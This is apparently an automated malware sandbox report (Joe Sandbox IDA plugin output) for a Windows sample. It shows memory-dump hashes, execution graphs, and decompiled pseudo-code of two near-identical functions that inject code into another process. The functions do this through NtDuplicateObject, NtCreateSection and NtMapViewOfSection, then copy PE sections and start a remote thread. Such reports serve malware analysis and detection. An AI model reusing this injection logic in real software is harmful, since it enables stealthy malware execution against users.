                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.354057852.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_409000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e04d1d10a0bf28517dd9bf7493e0fda7094ac7ecc28e9774a9b9ef750548915
                                                • Instruction ID: dfb240b6b77b13b2408b3faa7b7d10e4334a8ad1bbaa081121ff6b16fdce10e1
                                                • Opcode Fuzzy Hash: 4e04d1d10a0bf28517dd9bf7493e0fda7094ac7ecc28e9774a9b9ef750548915
                                                • Instruction Fuzzy Hash: F3A17C31510609CFDB18CF18C496A657BE0FF44354F2586AEE99A9F2E2C738ED51CB88
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1235fb553f314ef89bb8a52bd53efe18701fb1b95f888c05c5f14af6b28fe51
                                                • Instruction ID: d44b925607d4b1b2a2c3506b06714fa95131db1e7c7f8c80e0743aa4ca335550
                                                • Opcode Fuzzy Hash: d1235fb553f314ef89bb8a52bd53efe18701fb1b95f888c05c5f14af6b28fe51
                                                • Instruction Fuzzy Hash: 6F3155F311AA867FF2228A84EC97DFB772CD6681297184481FD54DB503C218C8628FB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.354057852.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_409000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: __close__fileno__flush__freebuf
                                                • String ID:
                                                • API String ID: 3871283149-0
                                                • Opcode ID: 677eaa535cfbfb641590dc26f4b113f3c0aa7ae26b93acb0f6d01b1c0ccda262
                                                • Instruction ID: fce6bbd1adf8aba4c15e15c63faf83b0a4d113cf38cf7de673c2230f9b0d9796
                                                • Opcode Fuzzy Hash: 677eaa535cfbfb641590dc26f4b113f3c0aa7ae26b93acb0f6d01b1c0ccda262
                                                • Instruction Fuzzy Hash: FBF04E71A007005AC630AA7B9C41C1BB3CCAD8537C7150B3FF5A8B31D1D67C89054AAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:2.8%
                                                Dynamic/Decrypted Code Coverage:81.2%
                                                Signature Coverage:0%
                                                Total number of Nodes:64
                                                Total number of Limit Nodes:1
                                                execution_graph 4844 402f00 4846 402f2f 4844->4846 4845 402ff6 4846->4845 4847 4019b6 8 API calls 4846->4847 4847->4845 4852 4019c1 4853 4019c4 4852->4853 4854 401a03 Sleep 4853->4854 4855 401a1e 4854->4855 4856 4015d5 7 API calls 4855->4856 4857 401a2f 4855->4857 4856->4857 4810 40300f 4811 402fcc 4810->4811 4813 402ff6 4810->4813 4812 4019b6 8 API calls 4811->4812 4812->4813 4737 402f51 4738 402f55 4737->4738 4740 402ff6 4738->4740 4741 4019b6 4738->4741 4742 4019c7 4741->4742 4743 401a03 Sleep 4742->4743 4744 401a1e 4743->4744 4746 401a2f 4744->4746 4747 4015d5 4744->4747 4746->4740 4748 4015e3 4747->4748 4749 401681 NtDuplicateObject 4748->4749 4758 40179d 4748->4758 4750 40169e NtCreateSection 4749->4750 4749->4758 4751 4016c4 NtMapViewOfSection 4750->4751 4752 40171e NtCreateSection 4750->4752 4751->4752 4753 4016e7 NtMapViewOfSection 4751->4753 4754 40174a 4752->4754 4752->4758 4753->4752 4755 401705 4753->4755 4756 401754 NtMapViewOfSection 4754->4756 4754->4758 4755->4752 4757 40177b NtMapViewOfSection 4756->4757 4756->4758 4757->4758 4758->4746 4858 4015d4 4859 4015e3 4858->4859 4860 401681 NtDuplicateObject 4859->4860 4869 40179d 4859->4869 4861 40169e NtCreateSection 4860->4861 4860->4869 4862 4016c4 NtMapViewOfSection 4861->4862 4863 40171e NtCreateSection 4861->4863 4862->4863 4864 4016e7 NtMapViewOfSection 4862->4864 4865 40174a 4863->4865 4863->4869 4864->4863 4866 401705 4864->4866 4867 401754 NtMapViewOfSection 4865->4867 4865->4869 4866->4863 4868 40177b NtMapViewOfSection 4867->4868 4867->4869 4868->4869 4759 409119 4760 409137 4759->4760 4761 409127 4759->4761 4763 409004 4760->4763 4764 409019 __isleadbyte_l 4763->4764 4766 409025 __isctype_l 4764->4766 4767 40bfaa 4764->4767 4766->4761 4768 40bfbd 4767->4768 4771 40bc05 4768->4771 4770 40bfdd 4770->4766 4772 40bc26 LCMapStringW 4771->4772 4773 40bc41 6 library calls 4771->4773 4772->4773 4773->4770 4838 401a39 4839 4019ce 4838->4839 4841 401a2f 4838->4841 4840 401a03 Sleep 4839->4840 4842 401a1e 4840->4842 4842->4841 4843 4015d5 7 API calls 4842->4843 4843->4841

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4015d5-4015de 1 4015e3-4015ef 0->1 2 4015ec 0->2 4 401603 1->4 5 4015f4-40162b call 401274 1->5 2->1 4->5 12 401630-401635 5->12 13 40162d 5->13 15 401956-40195e 12->15 16 40163b-40164c 12->16 13->12 15->12 21 401963-4019b3 call 401274 15->21 19 401652-40167b 16->19 20 401954 16->20 19->20 29 401681-401698 NtDuplicateObject 19->29 20->21 29->20 31 40169e-4016c2 NtCreateSection 29->31 32 4016c4-4016e5 NtMapViewOfSection 31->32 33 40171e-401744 NtCreateSection 31->33 32->33 35 4016e7-401703 NtMapViewOfSection 32->35 33->20 36 40174a-40174e 33->36 35->33 38 401705-40171b 35->38 36->20 39 401754-401775 NtMapViewOfSection 36->39 38->33 39->20 41 40177b-401797 NtMapViewOfSection 39->41 41->20 44 40179d call 4017a2 41->44
                                                C-Code - Quality: 55%
                                                			E004015D5(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				long _v12;
                                                				void* _v16;
                                                				void* _v20;
                                                				char _v44;
                                                				char _v52;
                                                				long _v56;
                                                				long _v60;
                                                				char _v64;
                                                				char _v68;
                                                				char _v72;
                                                				char _v76;
                                                				char _v84;
                                                				char _v88;
                                                				char _v92;
                                                				intOrPtr _v96;
                                                				char _v100;
                                                				void* __ebx;
                                                				void* __esi;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t131;
                                                				signed int _t138;
                                                				int _t139;
                                                				void* _t156;
                                                				signed int _t160;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				void* _t165;
                                                				intOrPtr* _t166;
                                                				void* _t169;
                                                				intOrPtr _t178;
                                                				void* _t179;
                                                				void* _t180;
                                                				void* _t185;
                                                				HANDLE* _t186;
                                                				HANDLE* _t187;
                                                				void* _t192;
                                                				intOrPtr* _t195;
                                                				intOrPtr _t198;
                                                				void* _t199;
                                                				intOrPtr* _t200;
                                                				void* _t203;
                                                				long _t218;
                                                
                                                				_push(0x392);
                                                				_t200 = _t199 + 4;
                                                				L00401274(0x161d, 0xf1, _t185, __eflags);
                                                				_t128 = _a4;
                                                				_v56 = 0;
                                                				if(gs != 0) {
                                                					_v56 = _v56 + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				_v96 = _t88;
                                                				_t186 =  &_v100;
                                                				 *_t186 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t186);
                                                				_t91 =  *_t186;
                                                				if(_t91 != 0) {
                                                					_t131 =  &_v52;
                                                					 *_t131 = _t91;
                                                					_t131[1] = 0;
                                                					_t186 =  &_v44;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
                                                					 *_t186 = 0x18;
                                                					_push( &_v52);
                                                					_push(_t186);
                                                					_push(0x40);
                                                					_push( &_v20);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
                                                						_v12 = 0;
                                                						_t99 =  &_v84;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t187 =  &_v88;
                                                						if(NtCreateSection(_t187, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							_push(_v84);
                                                							_pop( *_t25);
                                                							_t122 =  &_v72;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t187, 0xffffffff, _t122, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                								_t124 =  &_v64;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t187, _v16, _t124, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                									_t198 = _v72;
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t198, 0x104);
                                                									 *((intOrPtr*)(_t198 + 0x208)) = _a16;
                                                									_v12 = _v12 + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 =  &_v84;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 = _a12 + 0x10000;
                                                						_t186 =  &_v92;
                                                						if(NtCreateSection(_t186, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 && _v12 != 0) {
                                                							_push(_v84);
                                                							_pop( *_t46);
                                                							_t103 =  &_v76;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t186, 0xffffffff, _t103, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                								_t105 =  &_v68;
                                                								 *_t105 = 0;
                                                								_t218 = NtMapViewOfSection( *_t186, _v16, _t105, 0, 0, 0,  &_v60, 1, 0, 0x20);
                                                								if(_t218 == 0) {
                                                									L24();
                                                									if(_t218 == 0 && _t218 != 0) {
                                                										asm("hlt");
                                                										_push(_t200);
                                                									}
                                                									_push(0x2ea6);
                                                									_t203 = _t200 + 4;
                                                									_t160 = 0x2260;
                                                									_t161 = _t160 << 5;
                                                									_t162 = _t161 + 0x2260;
                                                									asm("lodsb");
                                                									_t163 = _t162;
                                                									asm("loop 0xffffffc4");
                                                									_t164 = _t163 ^ 0xad610a21;
                                                									_t200 = _t203 - _t164;
                                                									_t192 = _a8 +  *_a8;
                                                									_t138 =  *(_t192 + 6) & 0x0000ffff;
                                                									_push(_t192);
                                                									_t165 = _t192;
                                                									if(_v56 == 0) {
                                                										_t166 = _t165 + 0xf8;
                                                										__eflags = _t166;
                                                									} else {
                                                										_t166 = _t165 + 0x108;
                                                									}
                                                									_push(_t138);
                                                									_t139 =  *(_t166 + 0x10);
                                                									if(_t139 != 0) {
                                                										memcpy( *((intOrPtr*)(_t166 + 0xc)) + _v76,  *((intOrPtr*)(_t166 + 0x14)) + _a8, _t139);
                                                										_t200 = _t200 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t186);
                                                									_t222 = _v56;
                                                									if(_v56 == 0) {
                                                										_push(_t186);
                                                										_t169 = _t186[0xd] - _v68;
                                                										_t195 = _t186[0x28] + _v76;
                                                										__eflags = _t195;
                                                										while(1) {
                                                											__eflags =  *_t195;
                                                											if( *_t195 == 0) {
                                                												break;
                                                											}
                                                											_t178 =  *_t195;
                                                											_t195 = _t195 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t169;
                                                												__eflags =  *((intOrPtr*)(0 + _v76 + _t178));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t186);
                                                										__eflags = 0;
                                                										_t109 =  &_v8;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))(_v16, 0, 0, 0, 0, 0, _t186[0xa] + _v68, _v64, _t109, 0);
                                                									} else {
                                                										L57();
                                                										_pop(_t179);
                                                										_t180 = _t179 - 0x1892;
                                                										 *((intOrPtr*)(_t180 + 0x18c6)) = _t180 + 0x304c;
                                                										L004012E3(_t128, _t222);
                                                										0x33(_t180 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t180 + 0x18eb)) = _t180 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t200;
                                                				_push(0x392);
                                                				_t156 = 0xf1;
                                                				return L00401274(_t92, _t156, _t186, _t222);
                                                			}


























































                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c4
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401754
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: d042cd432a47886e0fdfab7ef2fc02bad20cb0d99d5aecb8309b5eacf05c0a0b
                                                • Instruction ID: f98827d68b3176c6101587f3b7b5f45d89ccd4612d0ba3f6c5a6805aca786af7
                                                • Opcode Fuzzy Hash: d042cd432a47886e0fdfab7ef2fc02bad20cb0d99d5aecb8309b5eacf05c0a0b
                                                • Instruction Fuzzy Hash: 0B614CB4A00205BBEB209F95CC49FEF7BB8EF81B00F14012AF912BA1E5D6759945DB25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 47 4015d4-4015ef 51 401603 47->51 52 4015f4-40162b call 401274 47->52 51->52 59 401630-401635 52->59 60 40162d 52->60 62 401956-40195e 59->62 63 40163b-40164c 59->63 60->59 62->59 68 401963-4019b3 call 401274 62->68 66 401652-40167b 63->66 67 401954 63->67 66->67 76 401681-401698 NtDuplicateObject 66->76 67->68 76->67 78 40169e-4016c2 NtCreateSection 76->78 79 4016c4-4016e5 NtMapViewOfSection 78->79 80 40171e-401744 NtCreateSection 78->80 79->80 82 4016e7-401703 NtMapViewOfSection 79->82 80->67 83 40174a-40174e 80->83 82->80 85 401705-40171b 82->85 83->67 86 401754-401775 NtMapViewOfSection 83->86 85->80 86->67 88 40177b-401797 NtMapViewOfSection 86->88 88->67 91 40179d call 4017a2 88->91
                                                C-Code - Quality: 55%
                                                			E004015D4(void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				long _v12;
                                                				void* _v16;
                                                				void* _v20;
                                                				char _v44;
                                                				char _v52;
                                                				long _v56;
                                                				long _v60;
                                                				char _v64;
                                                				char _v68;
                                                				char _v72;
                                                				char _v76;
                                                				char _v84;
                                                				char _v88;
                                                				char _v92;
                                                				intOrPtr _v96;
                                                				char _v100;
                                                				char _v119;
                                                				void* __ebx;
                                                				void* __esi;
                                                				intOrPtr _t90;
                                                				void* _t93;
                                                				intOrPtr _t94;
                                                				struct _GUID _t101;
                                                				struct _GUID _t103;
                                                				PVOID* _t105;
                                                				PVOID* _t107;
                                                				intOrPtr* _t111;
                                                				PVOID* _t124;
                                                				PVOID* _t126;
                                                				intOrPtr _t131;
                                                				void** _t135;
                                                				signed int _t142;
                                                				int _t143;
                                                				void* _t161;
                                                				signed int _t165;
                                                				signed int _t166;
                                                				signed int _t167;
                                                				signed int _t168;
                                                				signed int _t169;
                                                				void* _t170;
                                                				intOrPtr* _t171;
                                                				void* _t174;
                                                				intOrPtr _t185;
                                                				void* _t186;
                                                				void* _t187;
                                                				void* _t192;
                                                				HANDLE* _t193;
                                                				HANDLE* _t195;
                                                				void* _t200;
                                                				intOrPtr* _t203;
                                                				intOrPtr _t206;
                                                				void* _t210;
                                                				void* _t211;
                                                				intOrPtr* _t212;
                                                				void* _t216;
                                                				intOrPtr _t217;
                                                				long _t231;
                                                
                                                				_t1 =  &_v119;
                                                				 *_t1 = _v119 + __edx;
                                                				_t217 =  *_t1;
                                                				_t211 = _t210 - 0x60;
                                                				_push(_t192);
                                                				_push(0x392);
                                                				_t212 = _t211 + 4;
                                                				L00401274(0x161d, 0xf1, _t192, _t217);
                                                				_t131 = _a4;
                                                				_v56 = 0;
                                                				if(gs != 0) {
                                                					_v56 = _v56 + 1;
                                                				}
                                                				while(1) {
                                                					_t90 =  *((intOrPtr*)(_t131 + 0x48))();
                                                					if(_t90 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
                                                				}
                                                				_v96 = _t90;
                                                				_t193 =  &_v100;
                                                				 *_t193 = 0;
                                                				 *((intOrPtr*)(_t131 + 0x4c))(_t90, _t193);
                                                				_t93 =  *_t193;
                                                				if(_t93 != 0) {
                                                					_t135 =  &_v52;
                                                					 *_t135 = _t93;
                                                					_t135[1] = 0;
                                                					_t193 =  &_v44;
                                                					 *((intOrPtr*)(_t131 + 0x10))(_t193, 0x18);
                                                					 *_t193 = 0x18;
                                                					_push( &_v52);
                                                					_push(_t193);
                                                					_push(0x40);
                                                					_push( &_v20);
                                                					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
                                                						_v12 = 0;
                                                						_t101 =  &_v84;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 = 0x5000;
                                                						_t195 =  &_v88;
                                                						if(NtCreateSection(_t195, 6, 0, _t101, 4, 0x8000000, 0) == 0) {
                                                							_push(_v84);
                                                							_pop( *_t27);
                                                							_t124 =  &_v72;
                                                							 *_t124 = 0;
                                                							if(NtMapViewOfSection( *_t195, 0xffffffff, _t124, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                								_t126 =  &_v64;
                                                								 *_t126 = 0;
                                                								if(NtMapViewOfSection( *_t195, _v16, _t126, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                									_t206 = _v72;
                                                									 *((intOrPtr*)(_t131 + 0x20))(0, _t206, 0x104);
                                                									 *((intOrPtr*)(_t206 + 0x208)) = _a16;
                                                									_v12 = _v12 + 1;
                                                								}
                                                							}
                                                						}
                                                						_t103 =  &_v84;
                                                						 *((intOrPtr*)(_t103 + 4)) = 0;
                                                						 *_t103 = _a12 + 0x10000;
                                                						_t193 =  &_v92;
                                                						if(NtCreateSection(_t193, 0xe, 0, _t103, 0x40, 0x8000000, 0) == 0 && _v12 != 0) {
                                                							_push(_v84);
                                                							_pop( *_t48);
                                                							_t105 =  &_v76;
                                                							 *_t105 = 0;
                                                							if(NtMapViewOfSection( *_t193, 0xffffffff, _t105, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                								_t107 =  &_v68;
                                                								 *_t107 = 0;
                                                								_t231 = NtMapViewOfSection( *_t193, _v16, _t107, 0, 0, 0,  &_v60, 1, 0, 0x20);
                                                								if(_t231 == 0) {
                                                									L25();
                                                									if(_t231 == 0 && _t231 != 0) {
                                                										asm("hlt");
                                                										_push(_t212);
                                                									}
                                                									_push(0x2ea6);
                                                									_t216 = _t212 + 4;
                                                									_t165 = 0x2260;
                                                									_t166 = _t165 << 5;
                                                									_t167 = _t166 + 0x2260;
                                                									asm("lodsb");
                                                									_t168 = _t167;
                                                									asm("loop 0xffffffc4");
                                                									_t169 = _t168 ^ 0xad610a21;
                                                									_t212 = _t216 - _t169;
                                                									_t200 = _a8 +  *_a8;
                                                									_t142 =  *(_t200 + 6) & 0x0000ffff;
                                                									_push(_t200);
                                                									_t170 = _t200;
                                                									if(_v56 == 0) {
                                                										_t171 = _t170 + 0xf8;
                                                										__eflags = _t171;
                                                									} else {
                                                										_t171 = _t170 + 0x108;
                                                									}
                                                									_push(_t142);
                                                									_t143 =  *(_t171 + 0x10);
                                                									if(_t143 != 0) {
                                                										memcpy( *((intOrPtr*)(_t171 + 0xc)) + _v76,  *((intOrPtr*)(_t171 + 0x14)) + _a8, _t143);
                                                										_t212 = _t212 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t193);
                                                									_t235 = _v56;
                                                									if(_v56 == 0) {
                                                										_push(_t193);
                                                										_t174 = _t193[0xd] - _v68;
                                                										_t203 = _t193[0x28] + _v76;
                                                										__eflags = _t203;
                                                										while(1) {
                                                											__eflags =  *_t203;
                                                											if( *_t203 == 0) {
                                                												break;
                                                											}
                                                											_t185 =  *_t203;
                                                											_t203 = _t203 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t174;
                                                												__eflags =  *((intOrPtr*)(0 + _v76 + _t185));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t193);
                                                										__eflags = 0;
                                                										_t111 =  &_v8;
                                                										 *_t111 = 0;
                                                										 *((intOrPtr*)(_t131 + 0x98))(_v16, 0, 0, 0, 0, 0, _t193[0xa] + _v68, _v64, _t111, 0);
                                                									} else {
                                                										L58();
                                                										_pop(_t186);
                                                										_t187 = _t186 - 0x1892;
                                                										 *((intOrPtr*)(_t187 + 0x18c6)) = _t187 + 0x304c;
                                                										L004012E3(_t131, _t235);
                                                										0x33(_t187 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t187 + 0x18eb)) = _t187 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t94 =  *_t212;
                                                				_push(0x392);
                                                				_t161 = 0xf1;
                                                				return L00401274(_t94, _t161, _t193, _t235);
                                                			}





























































                                                0x004015d4
                                                0x004015d4
                                                0x004015d4
                                                0x004015d8
                                                0x004015dc
                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c4
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401754
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
